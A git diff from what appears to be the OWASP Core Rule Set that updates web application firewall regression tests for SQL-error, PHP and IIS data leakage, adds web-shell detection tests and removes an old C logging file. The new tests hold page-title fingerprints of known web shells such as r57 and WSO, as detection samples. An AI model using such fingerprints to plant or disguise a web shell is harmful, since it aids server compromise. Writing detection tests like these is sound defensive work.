-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: |-
             {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL Error: ORA-00933: SQL command not properly ended"}
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml
index beb26bbef..a06fe1273 100644
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml
@@ -17,7 +17,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: |-
             {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: DB2 SQL Error: SQLCODE=-104, SQLSTATE=42601, SQLERRMC=DECLARE"}
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml
index 25fcdcf04..940b7bf38 100644
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml
@@ -17,7 +17,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: |-
             {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: [DM_QUERY_E_SYNTAX]error:  \"A Parser Error (syntax error) has occurred in the vicinity of:  select * from dm_folder where folder in\""}
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml
index 161aaea10..eccad76bd 100644
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml
@@ -18,7 +18,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: |-
             {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Dynamic SQL Error"}
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml
index c92333950..929f24a55 100644
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml
@@ -17,7 +17,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: |-
             {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL-status: HY000 [FrontBase Inc.][FrontBase ODBC]Semantic error 217. Datatypes are not comparable or don't match. Semantic error 485. Near: SELECT DISTINCT * FROM SALES WHERE DATE>='2014-04-01';. Semantic error 485. Near: '2014-04-01'. Exception 363. Transaction rollback."}
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml
index 85bcf4ac6..d527bacc2 100644
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml
@@ -17,7 +17,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: |-
             {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: at org.hsqldb.jdbc.JDBCDriver.connect(Unknown Source)"}
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml
index 57f2cdc95..0d964851d 100644
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml
@@ -17,7 +17,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: |-
             {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Exception in thread \"main\" java.sql.SQLException: An illegal character has been found in the statement."}
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml
index d717ef4f3..3ddea0095 100644
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml
@@ -17,7 +17,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: |-
             {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: [5000A] [Actian][Ingres ODBC Driver][Ingres]Delimited identifier starting with '' contains no valid characters. (6692) (SQLExecDirectW)"}
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml
index ee8a31012..dbd97981b 100644
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml
@@ -17,7 +17,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: |-
             {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Unexpected end of command in statement [SELECT * FROM INTO WHERE 'place'='xxxxxxx' AND 'yielddate' BETWEEN '01/11/2012' AND '29/11/2012''']."}
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml
index 28239707b..b472e644a 100644
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml
@@ -17,7 +17,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: |-
             {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: maxdb_query(): -8004 POS(62) Constant must be compatible with column type and length"}
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml
index b66b43f98..e304fe604 100644
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml
@@ -17,7 +17,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: |-
             {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: PHP Warning:  mssql_query(): message: Incorrect syntax near 's'. (severity 15) in /Volumes/Data/Users/username/Desktop/createXML.php on line 375"}
@@ -38,7 +38,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: |-
             {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Conversion failed when converting the varchar value 'secret' to data type int."}
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml
index ee66a9da0..c8f48667e 100644
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml
@@ -17,7 +17,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: |-
             {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1772 (HY000): Malformed GTID set specification 'secret_password'."}
@@ -38,7 +38,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: |-
             {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1105 (HY000): XPATH syntax error: '\\secret'"}
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml
index 802915fd3..532d85ffb 100644
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml
@@ -17,7 +17,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: |-
             {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: pg_query(): supplied argument is not a valid PostgreSQL link resource in /var/www/sivusto/handler.php on line 56"}
@@ -38,7 +38,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: |-
             {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR:  invalid input syntax for integer"}
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml
index ebc1c439d..44e5cc97a 100644
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml
@@ -17,7 +17,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: |-
             {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: SQLite3::query() [sqlite3.query]: 1 values for 2 columns in /mysite/product.php on line 94"}
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml
index 852a60793..9a207ba7a 100644
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml
@@ -17,7 +17,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: |-
             {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: Sybase: Server message: Changed database context to 'rdhiman'. (severity 10, procedure N/A) in guestfatch.php on line 10"}
diff --git a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml
index 18149c32e..11c863ca9 100644
--- a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml
+++ b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml
@@ -17,7 +17,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "text/plain"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/post"
           data: "Maximum allowed file size is 10 MB"
         output:
@@ -37,7 +37,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "text/plain"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/post"
           data: "Invalid date selected"
         output:
@@ -57,7 +57,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "text/plain"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/post"
           data: "please review the function"
         output:
@@ -77,7 +77,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "text/plain"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/post"
           data: "This is a static function"
         output:
@@ -97,7 +97,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "text/plain"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/post"
           data: "Field cannot be empty."
         output:
diff --git a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml
index abb4ceb62..81b1d1c71 100644
--- a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml
+++ b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml
@@ -17,7 +17,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: |-
             {"body": "Maximum allowed file size is 10 MB"}
@@ -38,7 +38,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: |-
             {"body": "Invalid date selected"}
@@ -59,7 +59,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: |-
             {"body": "Please review the function"}
@@ -80,7 +80,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: |-
             {"body": "This is a static function"}
@@ -101,7 +101,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: |-
             {"body": "cannot be empty."}
diff --git a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml
index ddcfda844..447fe7594 100644
--- a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml
+++ b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml
@@ -17,7 +17,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: "{\"body\": \"<?php echo \\\"Hello World!\\n\\\" ?>\"}"
         output:
@@ -37,7 +37,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: |-
             {"body": "<?php12345"}
@@ -58,7 +58,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: |-
             {"body": "<? "}
@@ -79,7 +79,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: |-
             {"body": "<?1234"}
@@ -100,7 +100,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: "{\"body\": \"<?= \\\"Hello World!\\n\\\" =?>\"}"
         output:
@@ -120,7 +120,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: |-
             {"body": "<?=!@#$%^&"}
@@ -141,7 +141,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: "{\"body\": \"<?PhP echo \\\"Hello World!\\n\\\" ?>\"}"
         output:
diff --git a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml
index fb954c0ef..10486af95 100644
--- a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml
+++ b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml
@@ -1,6 +1,6 @@
 ---
 meta:
-  author: "Andrew Howe"
+  author: "Andrew Howe, Xhoenix"
 rule_id: 954100
 tests:
   - test_id: 1
@@ -15,9 +15,45 @@ tests:
             Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: "{\"body\": \"C:\\\\inetpub \\n\"}"
         output:
           log:
             expect_ids: [954100]
+  - test_id: 2
+    desc: 'Returns C:/inetpub in the response body'
+    stages:
+      - input:
+          dest_addr: "127.0.0.1"
+          port: 80
+          headers:
+            Host: "localhost"
+            User-Agent: "OWASP CRS test agent"
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Content-Type: "application/json"
+          method: "POST"
+          version: "HTTP/1.1"
+          uri: "/reflect"
+          data: "{\"body\": \"C:/inetpub \\n\"}"
+        output:
+          log:
+            expect_ids: [954100]
+  - test_id: 3
+    desc: 'Returns c:/inetpub(lower case) in the response body'
+    stages:
+      - input:
+          dest_addr: "127.0.0.1"
+          port: 80
+          headers:
+            Host: "localhost"
+            User-Agent: "OWASP CRS test agent"
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Content-Type: "application/json"
+          method: "POST"
+          version: "HTTP/1.1"
+          uri: "/reflect"
+          data: "{\"body\": \"c:/inetpub \\n\"}"
+        output:
+          log:
+            expect_ids: [954100]
diff --git a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955110.yaml b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955110.yaml
new file mode 100644
index 000000000..ec234b425
--- /dev/null
+++ b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955110.yaml
@@ -0,0 +1,23 @@
+---
+meta:
+  author: "TimDiam0nd"
+rule_id: 955110
+tests:
+  - test_id: 1
+    desc: "R57 Webshell Test as per https://github.com/r57shell/r57-shell/blob/e85aeeea421b76777e95ae00ae57bba79d5d9389/r57.php#L38"
+    stages:
+      - input:
+          dest_addr: "127.0.0.1"
+          port: 80
+          headers:
+            Host: "localhost"
+            User-Agent: "OWASP CRS test agent"
+            Content-Type: "application/json"
+          method: "POST"
+          version: "HTTP/1.1"
+          uri: "/reflect"
+          data: |-
+            {"body": "<html><head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\"><title>r57 Shell Version 1.50</title></head><body></body></html>"}
+        output:
+          log:
+            expect_ids: [955110]
diff --git a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955120.yaml b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955120.yaml
new file mode 100644
index 000000000..2e0cf89b3
--- /dev/null
+++ b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955120.yaml
@@ -0,0 +1,47 @@
+---
+meta:
+  author: "azurit"
+rule_id: 955120
+tests:
+  - test_id: 1
+    desc: "Matching web shell NCC Shell"
+    stages:
+      - input:
+          dest_addr: "127.0.0.1"
+          port: 80
+          headers:
+            Host: "localhost"
+            User-Agent: "OWASP CRS test agent"
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Accept-Encoding: "gzip,deflate"
+            Accept-Language: "en-us,en;q=0.5"
+            Content-Type: "application/json"
+          method: "POST"
+          version: "HTTP/1.1"
+          uri: "/reflect"
+          data: |-
+            {"body": "<html><head><meta http-equiv='Content-Type' content='text/html; charset=UTF-8'><title>example.com - WSO 4.2.6</title>"}
+        output:
+          log:
+            expect_ids: [955120]
+  - test_id: 2
+    desc: "Matching web shell Simple PHP backdoor"
+    stages:
+      - input:
+          dest_addr: "127.0.0.1"
+          port: 80
+          headers:
+            Host: "localhost"
+            User-Agent: "OWASP CRS test agent"
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Accept-Encoding: "gzip,deflate"
+            Accept-Language: "en-us,en;q=0.5"
+            Content-Type: "application/json"
+          method: "POST"
+          version: "HTTP/1.1"
+          uri: "/reflect"
+          data: |-
+            {"body": "<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title>example.com Wso 2024</title>"}
+        output:
+          log:
+            expect_ids: [955120]
diff --git a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955400.yaml b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955400.yaml
new file mode 100644
index 000000000..fbb73b114
--- /dev/null
+++ b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955400.yaml
@@ -0,0 +1,68 @@
+---
+meta:
+  author: "Xhoenix"
+rule_id: 955400
+tests:
+  - test_id: 1
+    desc: "Matching web shell Akmal archtte id ASPX shell"
+    stages:
+      - input:
+          dest_addr: "127.0.0.1"
+          port: 80
+          headers:
+            Host: "localhost"
+            User-Agent: "OWASP CRS test agent"
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Accept-Encoding: "gzip,deflate"
+            Accept-Language: "en-us,en;q=0.5"
+            Content-Type: "application/json"
+          method: "POST"
+          version: "HTTP/1.1"
+          uri: "/reflect"
+          data: |-
+            {"body": "<title>Webshell Akmal archtte id</title>"}
+        output:
+          log:
+            expect_ids: [955400]
+  - test_id: 2
+    desc: "Matching web shell ASPYDrv shell"
+    stages:
+      - input:
+          dest_addr: "127.0.0.1"
+          port: 80
+          headers:
+            Host: "localhost"
+            User-Agent: "OWASP CRS test agent"
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Accept-Encoding: "gzip,deflate"
+            Accept-Language: "en-us,en;q=0.5"
+            Content-Type: "application/json"
+          method: "POST"
+          version: "HTTP/1.1"
+          uri: "/reflect"
+          data: |-
+            {"body": "<html><title>ASPYDrvsInfo</title>"}
+        output:
+          log:
+            expect_ids: [955400]
+  - test_id: 3
+    desc: "Matching web shell RHTOOLS shell"
+    stages:
+      - input:
+          dest_addr: "127.0.0.1"
+          port: 80
+          headers:
+            Host: "localhost"
+            User-Agent: "OWASP CRS test agent"
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Accept-Encoding: "gzip,deflate"
+            Accept-Language: "en-us,en;q=0.5"
+            Content-Type: "application/json"
+          method: "POST"
+          version: "HTTP/1.1"
+          uri: "/reflect"
+          data: |-
+            {"body": "<html><head><title>RHTOOLS"}
+        output:
+          log:
+            expect_ids: [955400]
diff --git a/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml b/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml
index 1f1dbe8ab..c1f96d30e 100644
--- a/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml
+++ b/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml
@@ -22,7 +22,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: "{\"body\": \"<?php echo \\\"Hello World!\\n\\\" ?>\"}"
         output:
@@ -42,7 +42,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: |-
             {"body": "<?php12345"}
@@ -63,7 +63,7 @@ tests:
             Accept-Language: "en-us,en;q=0.5"
             Content-Type: "application/json"
           method: "POST"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/reflect"
           data: "{\"body\": \"<?php echo \\\"Hello World!\\n\\\" ?>\"}"
         output:
diff --git a/util/APPROVED_TAGS b/util/APPROVED_TAGS
index 5c48d8ecc..5fc4ca3d6 100644
--- a/util/APPROVED_TAGS
+++ b/util/APPROVED_TAGS
@@ -1,4 +1,24 @@
 OWASP_CRS
+OWASP_CRS/METHOD-ENFORCEMENT
+OWASP_CRS/SCANNER-DETECTION
+OWASP_CRS/PROTOCOL-ENFORCEMENT
+OWASP_CRS/PROTOCOL-ATTACK
+OWASP_CRS/MULTIPART-ATTACK
+OWASP_CRS/ATTACK-LFI
+OWASP_CRS/ATTACK-RFI
+OWASP_CRS/ATTACK-RCE
+OWASP_CRS/ATTACK-PHP
+OWASP_CRS/ATTACK-GENERIC
+OWASP_CRS/ATTACK-XSS
+OWASP_CRS/ATTACK-SQLI
+OWASP_CRS/ATTACK-SESSION-FIXATION
+OWASP_CRS/ATTACK-JAVA
+OWASP_CRS/DATA-LEAKAGES
+OWASP_CRS/DATA-LEAKAGES-SQL
+OWASP_CRS/DATA-LEAKAGES-JAVA
+OWASP_CRS/DATA-LEAKAGES-PHP
+OWASP_CRS/DATA-LEAKAGES-IIS
+OWASP_CRS/WEB-SHELLS
 PCI/12.1
 PCI/6.5.1
 PCI/6.5.10
diff --git a/util/FILENAME_EXCLUSIONS b/util/FILENAME_EXCLUSIONS
new file mode 100644
index 000000000..e8613c1d7
--- /dev/null
+++ b/util/FILENAME_EXCLUSIONS
@@ -0,0 +1,6 @@
+crs-setup.conf.example
+REQUEST-901-INITIALIZATION.conf
+REQUEST-905-COMMON-EXCEPTIONS.conf
+REQUEST-949-BLOCKING-EVALUATION.conf
+RESPONSE-959-BLOCKING-EVALUATION.conf
+RESPONSE-980-CORRELATION.conf
diff --git a/util/av-scanning/runAV/common.c b/util/av-scanning/runAV/common.c
deleted file mode 100755
index 08d212890..000000000
--- a/util/av-scanning/runAV/common.c
+++ /dev/null
@@ -1,652 +0,0 @@
-#include "common.h"
-
-int lock_file(char *filename)
-{
-	int fd;
-
-	if (!filename)
-		return -1;
-
-	if ((fd = open(filename,O_RDONLY | O_CREAT , S_IRWXU)) < 0) {
-		print_error("lock_file","open",modsec_rpc_log_file,errno);
-		return -1;
-	}
-
-	flock(fd,LOCK_EX);
-
-	return fd;
-}
-
-int unlock_file(int fd)
-{
-	flock(fd,LOCK_UN);
-	return 0;
-}
-
-int print_request(char* url,char *command,parameter_t *parameters, int num_of_parameters, int mask)
-{
-	char time_str[64], line[1024*1024];
-	time_t t;
-	int fd;
-	int i;
-
-	switch (atoi(modsec_rpc_log_level)) {
-	case DEBUG:
-			time(&t);
-			ctime_r(&t,time_str);
-			time_str[strlen(time_str)-1] = '\0';
-			if ((fd = open(modsec_rpc_log_file,O_WRONLY | O_CREAT | O_APPEND | O_SYNC , S_IRWXU)) < 0) {
-				print_error("print_request","open",modsec_rpc_log_file,errno);
-				fd=2;
-			}
-			flock(fd,LOCK_EX);
-			sprintf(line,"%s:REQUEST-BEGIN:======================================\n",time_str);
-			line[1024*1024-1]='\0';
-			write(fd,line,strlen(line));
-			snprintf(line,1024*1024,"URL:%s\nCommand:%s\n",url,command);
-			line[1024*1024-1]='\0';
-			write(fd,line,strlen(line));
-			for (i=0; i<num_of_parameters; i++) {
-				snprintf(line,1024*1024,"%s=",parameters[i].name);
-				line[1024*1024-1]='\0';
-				write(fd,line,strlen(line));
-				if (i == mask) {
-					sprintf(line,"XXXXXXX\n");
-					write(fd,line,strlen(line));
-				} else {
-					if (parameters[i].value) {
-						snprintf(line,1024*1024,"%s\n",parameters[i].value);
-						line[1024*1024-1]='\0';
-					}
-					else sprintf(line,"\n");
-					write(fd,line,strlen(line));
-				}
-
-			}
